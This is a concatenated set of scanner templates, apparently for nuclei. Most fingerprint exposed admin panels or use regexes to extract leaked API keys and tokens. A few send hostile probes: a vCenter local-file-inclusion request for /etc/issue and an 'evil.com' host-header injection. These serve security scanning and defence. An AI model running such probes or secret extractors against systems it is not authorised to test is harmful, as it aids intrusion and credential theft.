tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - 'Call Break CMS' 18 | condition: and 19 | -------------------------------------------------------------------------------- /certificate-validation.yaml: -------------------------------------------------------------------------------- 1 | id: improper-certificate-validation 2 | 3 | info: 4 | name: Improper Certificate Validation 5 | author: gaurang 6 | severity: medium 7 | tags: android,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - "Landroid/webkit/SslErrorHandler;->proceed()V" -------------------------------------------------------------------------------- /cockpit-detect.yaml: -------------------------------------------------------------------------------- 1 | id: cockpit-detect 2 | 3 | info: 4 | name: Detect Agentejo Cockpit 5 | author: dwisiswant0 6 | severity: info 7 | tags: tech,cockpit 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/auth/login" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Authenticate Please!" 17 | -------------------------------------------------------------------------------- /compal.yaml: -------------------------------------------------------------------------------- 1 | id: compal-panel-detect 2 | 3 | info: 4 | name: Compal CH7465LG panel detect 5 | author: fabaff 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/common_page/login.html" 12 | matchers: 13 | - type: word 14 | words: 15 | - "" 16 | part: body 17 | -------------------------------------------------------------------------------- /couchdb-fauxton.yaml: -------------------------------------------------------------------------------- 1 | id: couchdb-fauxton 2 | 3 | info: 4 | name: Apache CouchDB Fauxton Exposure 5 | author: pdteam 6 | severity: low 7 | tags: panel,apache,couchdb 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - 'Project Fauxton' 18 | -------------------------------------------------------------------------------- /cx-cloud-login.yaml: -------------------------------------------------------------------------------- 1 | id: cx-cloud-login 2 | 3 | info: 4 | name: CX Cloud 5 | author: dhiyaneshDk 6 | severity: info 7 | tags: panel,cx 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | - '{{BaseURL}}/cxcum/' 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - "CX Cloud" 19 | -------------------------------------------------------------------------------- /deadbolt-ransomware.yaml: -------------------------------------------------------------------------------- 1 | id: deadbolt-ransomware 2 | 3 | info: 4 | name: Deadbolt Ransomware Detection 5 | author: pdteam 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}" 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - "ALL YOUR FILES HAVE BEEN LOCKED BY DEADBOLT." -------------------------------------------------------------------------------- /flink-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: flink-exposure 2 | 3 | info: 4 | name: Apache Flink Exposure 5 | author: pdteam 6 | severity: low 7 | tags: panel,apache,flink 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - 'Apache Flink Web Dashboard' 18 | -------------------------------------------------------------------------------- /rabbitmq-dashboard.yaml: -------------------------------------------------------------------------------- 1 | id: rabbitmq-dashboard 2 | 3 | info: 4 | name: RabbitMQ Dashboard 5 | author: fyoorer 6 | severity: info 7 | tags: panel,rabbitmq 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | matchers: 14 | - type: word 15 | words: 16 | - "RabbitMQ Management" 17 | part: body 18 | -------------------------------------------------------------------------------- /redash-detection.yaml: -------------------------------------------------------------------------------- 1 | id: redash-panel 2 | 3 | info: 4 | name: Redash Panel 5 | author: Adam Crosser 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/' 13 | redirects: true 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - 'Login to Redash' 19 | -------------------------------------------------------------------------------- /bitly-secret-key.yaml: -------------------------------------------------------------------------------- 1 | id: bitly-secret-key 2 | 3 | info: 4 | name: Bitly Secret Key Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,bitly 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - 'R_[0-9a-f]{32}' -------------------------------------------------------------------------------- /kafka-connect-ui.yaml: -------------------------------------------------------------------------------- 1 | id: kafka-connect-ui 2 | 3 | info: 4 | name: Apache Kafka Connect UI Exposure 5 | author: pdteam 6 | severity: low 7 | tags: panel,kafka,apache 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - 'Kafka Connect UI' 18 | -------------------------------------------------------------------------------- /slack-bot-token.yaml: -------------------------------------------------------------------------------- 1 | id: slack-bot-token 2 | 3 | info: 4 | name: Slack access token 5 | author: nadino 6 | severity: info 7 | tags: exposure,token,slack 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - "xoxb-[0-9A-Za-z\\-]{51}" -------------------------------------------------------------------------------- /api/newrelic-rest-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: newrelic-rest-api-key 2 | 3 | info: 4 | name: REST API Key Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - '(?i)NRRA-[a-f0-9]{42}' -------------------------------------------------------------------------------- /hadoop-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: hadoop-exposure 2 | 3 | info: 4 | name: Apache Hadoop Exposure 5 | author: pdteam 6 | severity: low 7 | tags: panel,apache,hadoop 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/dfshealth.html' 13 | matchers: 14 | - type: word 15 | words: 16 | - '
Hadoop
' 17 | -------------------------------------------------------------------------------- /paypal-braintree-token.yaml: -------------------------------------------------------------------------------- 1 | id: paypal-braintree-token 2 | 3 | info: 4 | name: Paypal Braintree Access Token 5 | author: gaurang 6 | severity: high 7 | tags: token,file,paypal 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "access_token\\$production\\$[0-9a-z]{16}\\$[0-9a-f]{32}" 17 | -------------------------------------------------------------------------------- /webview-javascript.yaml: -------------------------------------------------------------------------------- 1 | id: webview-javascript-enabled 2 | 3 | info: 4 | name: Webview JavaScript enabled 5 | author: gaurang 6 | severity: info 7 | tags: android,file,javascript 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - "Landroid/webkit/WebSettings;->setJavaScriptEnabled(Z)V" 17 | -------------------------------------------------------------------------------- /wordpress/wp-xmlrpc.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-xmlrpc-file 2 | 3 | info: 4 | name: WordPress xmlrpc 5 | author: udit_thakkur 6 | severity: info 7 | tags: wordpress 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/xmlrpc.php" 13 | matchers: 14 | - type: word 15 | words: 16 | - 'XML-RPC server accepts POST requests only.' 17 | -------------------------------------------------------------------------------- /api/newrelic-admin-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: newrelic-admin-api-key 2 | 3 | info: 4 | name: Admin API Key Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - '(?i)NRAA-[a-f0-9]{27}' -------------------------------------------------------------------------------- /git/gitlab-ci.yaml: -------------------------------------------------------------------------------- 1 | id: database-username-and-password 2 | 3 | info: 4 | name: database-username-and-password 5 | author: me 6 | severity: high 7 | tags: github 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/.gitlab-ci.yml" 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "variables:" 18 | condition: and -------------------------------------------------------------------------------- /kubernetes/kubernetes-dashboard.yaml: -------------------------------------------------------------------------------- 1 | id: kubernetes-dashboard 2 | 3 | info: 4 | name: Kubernetes Console Exposure 5 | author: pdteam 6 | severity: low 7 | tags: panel,kubernetes,devops 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Kubernetes Dashboard" 17 | -------------------------------------------------------------------------------- /mantis-detect.yaml: -------------------------------------------------------------------------------- 1 | id: mantis-detect 2 | 3 | info: 4 | name: Mantis portal detection 5 | author: makyotox 6 | severity: info 7 | tags: panel,mantis 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/login_page.php" 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "MantisBT" 18 | part: body 19 | -------------------------------------------------------------------------------- /slack-user-token.yaml: -------------------------------------------------------------------------------- 1 | id: slack-user-token 2 | 3 | info: 4 | name: Slack User token disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,slack 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - "xoxp-[0-9A-Za-z\\-]{72}" -------------------------------------------------------------------------------- /slack-webhook.yaml: -------------------------------------------------------------------------------- 1 | id: slack-webhook 2 | 3 | info: 4 | name: Slack Webhook 5 | author: gaurang 6 | severity: high 7 | tags: token,file,slack 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "https://hooks.slack.com/services/T[0-9A-Za-z\\-_]{8}/B[0-9A-Za-z\\-_]{8}/[0-9A-Za-z\\-_]{24}" 17 | -------------------------------------------------------------------------------- /x-hacker.yaml: -------------------------------------------------------------------------------- 1 | id: x-hacker 2 | 3 | info: 4 | name: Displays the X-Hacker server header if defined 5 | author: geeknik 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}" 12 | 13 | extractors: 14 | - type: regex 15 | part: header 16 | name: x-hacker 17 | regex: 18 | - '(?i)X-Hacker:.*' 19 | -------------------------------------------------------------------------------- /a-fingerprinting/nacos-detect.yaml: -------------------------------------------------------------------------------- 1 | id: nacos-detect 2 | 3 | info: 4 | name: Nacos Detect 5 | author: zan8in 6 | severity: info 7 | verified: true 8 | 9 | rules: 10 | r0: 11 | request: 12 | method: GET 13 | path: /nacos/ 14 | follow_redirects: true 15 | expression: response.status == 200 && response.body.bcontains(b'Nacos') 16 | expression: r0() -------------------------------------------------------------------------------- /aims-password-mgmt-client.yaml: -------------------------------------------------------------------------------- 1 | id: aims-password-mgmt-client 2 | 3 | info: 4 | name: Aims Password Management Client Detect 5 | author: iamthefrogy 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/aims/ps/" 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "Avatier Corporation" 18 | -------------------------------------------------------------------------------- /biometric-detect.yaml: -------------------------------------------------------------------------------- 1 | id: biometric-detect 2 | 3 | info: 4 | name: Biometric or Fingerprint detect 5 | author: gaurang 6 | severity: info 7 | tags: android,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - "android.permission.USE_FINGERPRINT" 17 | - "android.permission.USE_BIOMETRIC" -------------------------------------------------------------------------------- /kafka-topics-ui.yaml: -------------------------------------------------------------------------------- 1 | id: kafka-topics-ui 2 | 3 | info: 4 | name: Apache Kafka Topics UI Exposure 5 | author: pdteam 6 | severity: low 7 | tags: panel,kafka,apache 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - 'Kafka Topics UI - Browse Kafka Data' 18 | -------------------------------------------------------------------------------- /kronos-workforce-central.yaml: -------------------------------------------------------------------------------- 1 | id: kronos-workforce-central 2 | 3 | info: 4 | name: Kronos Workforce Central Panel 5 | author: emadshanab 6 | severity: info 7 | tags: panel,kronos 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/wfc/portal' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - 'Kronos Workforce Central' 18 | -------------------------------------------------------------------------------- /maian-cart-detect.yaml: -------------------------------------------------------------------------------- 1 | id: maian-cart-detect 2 | 3 | info: 4 | name: Maian Cart Detection 5 | author: pdteam 6 | severity: info 7 | tags: tech,maian 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/favicon.ico" 13 | 14 | matchers: 15 | - type: dsl 16 | dsl: 17 | - "status_code==200 && (\"-498581627\" == mmh3(base64_py(body)))" -------------------------------------------------------------------------------- /newrelic-insights-key.yaml: -------------------------------------------------------------------------------- 1 | id: newrelic-insights-key 2 | 3 | info: 4 | name: Insights Keys Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - '(?i)NRI(?:I|Q)-[A-Za-z0-9\-_]{32}' -------------------------------------------------------------------------------- /rocketmq-console-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: rocketmq-console-exposure 2 | 3 | info: 4 | name: Apache RocketMQ Console Exposure 5 | author: pdteam 6 | severity: info 7 | tags: panel,apache 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "RocketMq-console-ng" 18 | -------------------------------------------------------------------------------- /s3-detect.yaml: -------------------------------------------------------------------------------- 1 | id: s3-detect 2 | 3 | info: 4 | name: Detect Amazon-S3 Bucket 5 | author: melbadry9 6 | severity: info 7 | tags: aws,s3,bucket,tech 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/%c0" 13 | matchers: 14 | - type: regex 15 | regex: 16 | - "(?:InvalidURI|InvalidArgument|NoSuchBucket)" 17 | part: body 18 | -------------------------------------------------------------------------------- /smtp-detection.yaml: -------------------------------------------------------------------------------- 1 | id: smtp-service-detection 2 | 3 | info: 4 | name: SMTP Service Detection 5 | author: pussycat0x 6 | severity: info 7 | tags: network,service,smtp 8 | 9 | network: 10 | - inputs: 11 | - data: "\r\n" 12 | host: 13 | - "{{Hostname}}" 14 | - "{{Host}}:25" 15 | matchers: 16 | - type: word 17 | words: 18 | - "SMTP" 19 | -------------------------------------------------------------------------------- /square-access-token.yaml: -------------------------------------------------------------------------------- 1 | id: square-access-token 2 | 3 | info: 4 | name: Square Access Token 5 | author: gaurang,daffainfo 6 | severity: high 7 | tags: token,file,square 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "EAAAE[a-zA-Z0-9_-]{59}" 17 | - "sq0atp-[0-9A-Za-z\\-_]{22}" 18 | -------------------------------------------------------------------------------- /supervpn-panel.yaml: -------------------------------------------------------------------------------- 1 | id: supervpn-detect 2 | 3 | info: 4 | name: SuperVPN panel detect 5 | author: organiccrap 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/admin/login.html" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Sign In-SuperVPN" 17 | part: body 18 | -------------------------------------------------------------------------------- /webview-universal-access.yaml: -------------------------------------------------------------------------------- 1 | id: webview-universal-access 2 | 3 | info: 4 | name: Webview Universal Access enabled 5 | author: gaurang 6 | severity: medium 7 | tags: android,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - "Landroid/webkit/WebSettings;->setAllowUniversalAccessFromFileURLs(Z)V" -------------------------------------------------------------------------------- /X-Host.yaml: -------------------------------------------------------------------------------- 1 | id: x-host 2 | 3 | info: 4 | name: x-host 5 | author: Kabilan S 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | # Example of sending some headers to the servers 11 | headers: 12 | 13 | X-Host: "evil.com" 14 | path: 15 | - "{{BaseURL}}/" 16 | matchers: 17 | - type: word 18 | words: 19 | - "evil.com" 20 | -------------------------------------------------------------------------------- /a-fingerprinting/solarwinds-orion-panel.yaml: -------------------------------------------------------------------------------- 1 | id: solarwinds-orion 2 | 3 | info: 4 | name: SolarWinds Orion Panel 5 | author: puzzlepeaches 6 | severity: info 7 | verified: true 8 | 9 | rules: 10 | r0: 11 | request: 12 | method: GET 13 | path: /Orion/Login.aspx 14 | expression: response.status == 200 && response.body.bcontains(b'SolarWinds Orion') 15 | expression: r0() -------------------------------------------------------------------------------- /a-fingerprinting/spring-detect.yaml: -------------------------------------------------------------------------------- 1 | id: spring-detect 2 | 3 | info: 4 | name: Spring detected 5 | author: Adam Crosser 6 | severity: info 7 | verified: true 8 | 9 | rules: 10 | r0: 11 | request: 12 | method: GET 13 | path: /error 14 | follow_redirects: true 15 | expression: response.status == 500 && response.body.bcontains(b'"status":999') 16 | expression: r0() -------------------------------------------------------------------------------- /compal-panel.yaml: -------------------------------------------------------------------------------- 1 | id: compal-panel-detect 2 | 3 | info: 4 | name: Compal CH7465LG panel detect 5 | author: fabaff 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/common_page/login.html" 13 | matchers: 14 | - type: word 15 | words: 16 | - "" 17 | part: body 18 | -------------------------------------------------------------------------------- /easyredir.yaml: -------------------------------------------------------------------------------- 1 | id: easyredir-takeover 2 | 3 | info: 4 | name: easyredir Takeover Detection 5 | author: harish 6 | severity: high 7 | tags: takeover 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "This IP or CNAME is part of EasyRedir's URL redirection edge network." 18 | -------------------------------------------------------------------------------- /firebase-database.yaml: -------------------------------------------------------------------------------- 1 | id: firebase-database 2 | 3 | info: 4 | name: Firebase Database Detect 5 | author: gaurang 6 | severity: info 7 | tags: token,file,firebase 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "[a-z0-9.-]+\\.firebaseio\\.com" 17 | - "[a-z0-9.-]+\\.firebaseapp\\.com" 18 | -------------------------------------------------------------------------------- /solarwinds-orion.yaml: -------------------------------------------------------------------------------- 1 | id: solarwinds-orion 2 | 3 | info: 4 | name: SolarWinds Orion Panel 5 | author: puzzlepeaches 6 | severity: info 7 | tags: panel,solarwinds 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/Orion/Login.aspx" 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "SolarWinds Orion" 18 | part: body 19 | -------------------------------------------------------------------------------- /sonarqube-login.yaml: -------------------------------------------------------------------------------- 1 | id: sonarqube-login 2 | 3 | info: 4 | name: SonarQube panel detect 5 | author: dhiyaneshDk 6 | severity: info 7 | tags: panel,sonarqube 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/sessions/new" 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "SonarQube" 18 | part: body 19 | -------------------------------------------------------------------------------- /sql-server-reporting.yaml: -------------------------------------------------------------------------------- 1 | id: sql-server-reporting 2 | 3 | info: 4 | name: Detect Microsoft SQL Server Reporting 5 | author: puzzlepeaches 6 | severity: info 7 | tags: tech,microsoft 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/Reports/Pages/Folder.aspx" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Report Manager" 17 | -------------------------------------------------------------------------------- /zipkin-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: zipkin-exposure 2 | 3 | info: 4 | name: Zipkin Exposure 5 | author: pdteam 6 | severity: low 7 | tags: panel,zipkin 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | - "{{BaseURL}}/zipkin/" 14 | matchers: 15 | - type: word 16 | part: body 17 | words: 18 | - "webpackJsonpzipkin-lens" 19 | -------------------------------------------------------------------------------- /basic-cors-flash.yaml: -------------------------------------------------------------------------------- 1 | id: basic-cors-misconfig-flash 2 | 3 | info: 4 | name: Basic CORS misconfiguration exploitable with Flash 5 | author: nadino 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/crossdomain.xml" 12 | matchers: 13 | - type: word 14 | words: 15 | - 'allow-access-from domain="*"' 16 | part: body 17 | -------------------------------------------------------------------------------- /jwt-token.yaml: -------------------------------------------------------------------------------- 1 | id: jwt-token 2 | 3 | info: 4 | name: JWT Token Disclosure 5 | author: Ice3man 6 | severity: unknown 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - 'eyJ[a-zA-Z0-9]{10,}\.eyJ[a-zA-Z0-9]{10,}\.[a-zA-Z0-9_\-]{10,}' -------------------------------------------------------------------------------- /kafka-monitoring.yaml: -------------------------------------------------------------------------------- 1 | id: kafka-monitoring 2 | 3 | info: 4 | name: Apache Kafka Monitor Exposure 5 | author: pdteam 6 | severity: low 7 | tags: panel,kafka,apache 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - '>KafkaMonitor' 18 | - '>Kafka Monitor GUI' 19 | -------------------------------------------------------------------------------- /sonicwall-sslvpn-panel.yaml: -------------------------------------------------------------------------------- 1 | id: sonicwall-sslvpn-panel 2 | 3 | info: 4 | name: SonicWall Virtual Office SSLVPN Panel 5 | author: PR3R00T 6 | severity: info 7 | tags: panel,sonicwall 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/cgi-bin/welcome" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Virtual Office" 17 | -------------------------------------------------------------------------------- /stridercd-detection.yaml: -------------------------------------------------------------------------------- 1 | id: stridercd-detection 2 | 3 | info: 4 | name: StriderCD Panel 5 | author: Adam Crosser 6 | severity: info 7 | tags: panel,cicd 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/' 13 | redirects: true 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - "Strider" 19 | -------------------------------------------------------------------------------- /stripe-secret-key.yaml: -------------------------------------------------------------------------------- 1 | id: stripe-secret-key 2 | 3 | info: 4 | name: Stripe Secret Key Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,stripe 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - 'sk_(?:live|test)_[0-9a-zA-Z]{24}' 18 | -------------------------------------------------------------------------------- /twitter-secret.yaml: -------------------------------------------------------------------------------- 1 | id: twitter-secret 2 | 3 | info: 4 | name: Twitter Secret 5 | author: gaurang,daffainfo 6 | severity: medium 7 | tags: token,file,twitter 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "(?i)twitter(.{0,20})?[0-9a-z]{35,44}" 17 | - "(?i)twitter(.{0,20})?['\"][0-9a-z]{35,44}" -------------------------------------------------------------------------------- /unauthenticated-lansweeper.yaml: -------------------------------------------------------------------------------- 1 | id: unauthenticated-lansweeper 2 | 3 | info: 4 | name: Unauthenticated Lansweeper Instance 5 | author: divya_mudgal 6 | severity: high 7 | tags: lansweeper,unauth 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/Default.aspx" 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "Main page - Lansweeper" -------------------------------------------------------------------------------- /vm/vmware-vcenter-lfi-linux.yaml: -------------------------------------------------------------------------------- 1 | id: vmware-vcenter-lfi-linux 2 | 3 | info: 4 | name: Vmware Vcenter LFI for Linux appliances 5 | author: PR3R00T 6 | severity: high 7 | tags: vmware,lfi,vcenter 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/eam/vib?id=/etc/issue" 13 | matchers: 14 | - type: word 15 | words: 16 | - "vCenter Server" 17 | -------------------------------------------------------------------------------- /yopass-panel.yaml: -------------------------------------------------------------------------------- 1 | id: yopass-panel 2 | 3 | info: 4 | name: Yopass Application Exposure 5 | author: Adam Crosser 6 | severity: info 7 | metadata: 8 | shodan-query: title:"Yopass" 9 | tags: panel,yopass 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}' 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - "<title>Yopass" 20 | -------------------------------------------------------------------------------- /amazon-sns-token.yaml: -------------------------------------------------------------------------------- 1 | id: amazon-sns-token 2 | 3 | info: 4 | name: Amazon SNS Token Detect 5 | author: TheBinitGhimire 6 | severity: info 7 | tags: file,token,amazon,aws 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | name: amazon-sns-topic 16 | regex: 17 | - 'arn:aws:sns:[a-z0-9\-]+:[0-9]+:[A-Za-z0-9\-_]+' 18 | -------------------------------------------------------------------------------- /amazon-sns-topic.yaml: -------------------------------------------------------------------------------- 1 | id: amazon-sns-topic 2 | 3 | info: 4 | name: Amazon SNS Topic Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,amazon 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - 'arn:aws:sns:[a-z0-9\-]+:[0-9]+:[A-Za-z0-9\-_]+' -------------------------------------------------------------------------------- /api/strapi-admin-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: strapi-admin-exposure 2 | 3 | info: 4 | name: Strapi Admin Dasboard Exposure 5 | author: pdteam 6 | severity: info 7 | tags: panel 8 | 9 | 10 | requests: 11 | - raw: 12 | - | 13 | GET /admin/auth/login HTTP/1.1 14 | Host: {{Hostname}} 15 | matchers: 16 | - type: word 17 | words: 18 | - "<title>Strapi Admin" -------------------------------------------------------------------------------- /api/wsdl-api.yaml: -------------------------------------------------------------------------------- 1 | id: wsdl-api 2 | 3 | info: 4 | name: wsdl-detect 5 | author: jarijaas 6 | severity: info 7 | description: Detects web services that have WSDL (https://www.w3.org/TR/wsdl/) 8 | tags: exposure,api 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/?wsdl" 14 | matchers: 15 | - type: word 16 | words: 17 | - "wsdl:definitions" -------------------------------------------------------------------------------- /argocd-detect.yaml: -------------------------------------------------------------------------------- 1 | id: argocd-detect 2 | 3 | info: 4 | name: Argo CD Detect 5 | author: Adam Crosser 6 | severity: info 7 | description: Detects the Argo CD website console 8 | tags: tech,argocd 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | part: body 18 | words: 19 | - 'Argo CD' -------------------------------------------------------------------------------- /bazarr-login.yaml: -------------------------------------------------------------------------------- 1 | id: bazarr-login-detect 2 | 3 | info: 4 | name: Bazarr Login Detect 5 | author: r3dg33k 6 | severity: info 7 | reference: 8 | - https://www.bazarr.media/ 9 | tags: panel,bazarr,login 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/login" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - '<title>Bazarr' -------------------------------------------------------------------------------- /exposed-pagespeed-global-admin.yaml: -------------------------------------------------------------------------------- 1 | id: exposed-pagespeed-global-admin 2 | 3 | info: 4 | name: Apache PageSpeed Global Admin Dashboard Exposure 5 | author: pdteam 6 | severity: medium 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/pagespeed_admin/' 13 | matchers: 14 | - type: word 15 | words: 16 | - "Pagespeed Admin" -------------------------------------------------------------------------------- /oauth-access-key.yaml: -------------------------------------------------------------------------------- 1 | id: google-oauth-access-key 2 | 3 | info: 4 | name: Google OAuth Access Key Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,google 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - 'ya29\.[0-9A-Za-z\-_]+' 19 | -------------------------------------------------------------------------------- /parallels-html-client.yaml: -------------------------------------------------------------------------------- 1 | id: parallels-html-client 2 | 3 | info: 4 | name: Parallels HTML5 Client 5 | author: pdteam 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/RASHTML5Gateway/" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Parallels HTML5 Client" 17 | part: body 18 | -------------------------------------------------------------------------------- /urge-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: surge-takeover 2 | 3 | info: 4 | name: surge takeover detection 5 | author: pdcommunity 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - project not found -------------------------------------------------------------------------------- /webview-addjavascript-interface.yaml: -------------------------------------------------------------------------------- 1 | id: webview-addjavascript-interface 2 | 3 | info: 4 | name: Webview addJavascript Interface Usage 5 | author: gaurang 6 | severity: info 7 | tags: 